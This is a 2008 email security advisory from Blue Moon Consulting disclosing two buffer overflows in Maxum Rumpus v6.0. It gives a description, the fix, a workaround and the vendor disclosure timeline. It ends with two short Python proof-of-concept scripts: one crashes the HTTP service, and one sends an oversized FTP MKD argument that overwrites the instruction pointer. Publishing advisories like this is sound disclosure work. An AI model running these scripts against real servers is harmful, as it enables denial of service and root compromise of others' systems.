--Signature=_Mon__1_Dec_2008_23_56_19_+0700_V6rSTsd0 OMyBpHHk
Content-Type: text/plain; charset=US-ASCII
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

BLUE MOON SECURITY ADVISORY 2008-09
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3 D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D


:Title: Two buffer overflows in Maxum Rumpus
:Severity: Critical
:Reporter: Blue Moon Consulting
:Products: Maxum Rumpus v6.0
:Fixed in: 6.0.1


Description
-----------

Rumpus turns any Mac into a file transfer server.

Rumpus v6.0 contains two buffer overflow vulnerabilities in its HTTP and FT=
P modules. The first allows an unauthenticated user to crash Rumpus. The la=
ter may result in arbitrary code execution under superuser privilege.

The overflow in HTTP component is caused by the lack of boundary check when=
parsing for HTTP action verb (GET, POST, PUT, etc.). If the verb is exactl=
y 2908-byte long, the server runs into a segmentation fault and crashes. A =
manual restart is required. It has been observed that this problem occurs a=
t other verb lengths too. The vulnerability is rated at moderate severity f=
or the lost of service.

The overflow in FTP component is also caused by the lack of length check wh=
en parsing FTP commands that take argument such as ``MKD``, ``XMKD``, ``RMD=
`` and so on. The overflow occurs when the argument is ``strcpy`` to an int=
ernal buffer. This buffer is 1024-byte long. When the passed-in argument is=
longer than 1046 bytes, the instruction pointer will be overwritten. This =
allows a successful attack to run arbitrary code under the privilege of a s=
uperuser (root) by default. Though authorization is required to exploit thi=
s security bug, the vulnerability is rated at critical severity because the=
FTP daemon could be allowing anonymous access.

Workaround
----------

There is no workaround the first bug.

Disable ANONYMOUS and only allow trusted users to use FTP.

Fix
---

Maxum has released Rumpus v6.0.1 which addressed these bugs.

Disclosure
----------

Blue Moon Consulting adapts `RFPolicy v2.0 <http://www.wiretrip.net/rfp/pol=
icy.html>`_ in notifying vendors.

:Initial vendor contact:

November 28, 2008: Initial contact sent to support@maxum.com

:Vendor response:

November 28, 2008: John requested further communications to be sent to th=
e same address.

:Further communication:

November 28, 2008: Technical details and request for regular update of a =
patch sent to the vendor.

November 29, 2008: Vendor thanked for the bug report and planned to relea=
se v6.0.1 on Monday, December 01.

December 01, 2008: Vendor released 6.0.1 and posted release note at http:=
//www.maxum.com/Rumpus/News601.html.

:Public disclosure: December 01, 2008

:Exploit code:

For the vulnerability in HTTP component::

from socket import socket, AF_INET, SOCK_STREAM

host =3D "192.168.1.12"
port =3D 80

s =3D socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send('z' * 2908 + '\n\n')
s.recv(1024)
s.close()

For the vulnerability in FTP component::

from socket import socket, AF_INET, SOCK_STREAM
=20
host =3D "192.168.1.12"
port =3D 21
user =3D "regular"
pass_ =3D "training"
=20
commands =3D [
'user regular\n',
'pass training\n',
'mkd ' + 'z' * 1046 + 'abcd\n'
]
=20
s =3D socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.recv(1024)
for line in commands:
s.send(line)
s.recv(1024)
s.close()

Disclaimer
----------

The information provided in this advisory is provided "as is" without warra=
nty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, ei=
ther express or implied, including the warranties of merchantability and fi=
tness for a particular purpose. Your use of the information on the advisory=
or materials linked from the advisory is at your own risk. Blue Moon Consu=
lting Co., Ltd reserves the right to change or update this notice at any ti=
me.

--Signature=_Mon__1_Dec_2008_23_56_19_+0700_V6rSTsd0 OMyBpHHk
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAkk0FzMACgkQbKzcTD214ZfTpgCfbW7vSKOjWf/18jvwK6Y2Uwmd
zPAAoJX+CHQwr10VgangC7Hs3v7bug5H
=oAv3
-----END PGP SIGNATURE-----

--Signature=_Mon__1_Dec_2008_23_56_19_+0700_V6rSTsd0 OMyBpHHk--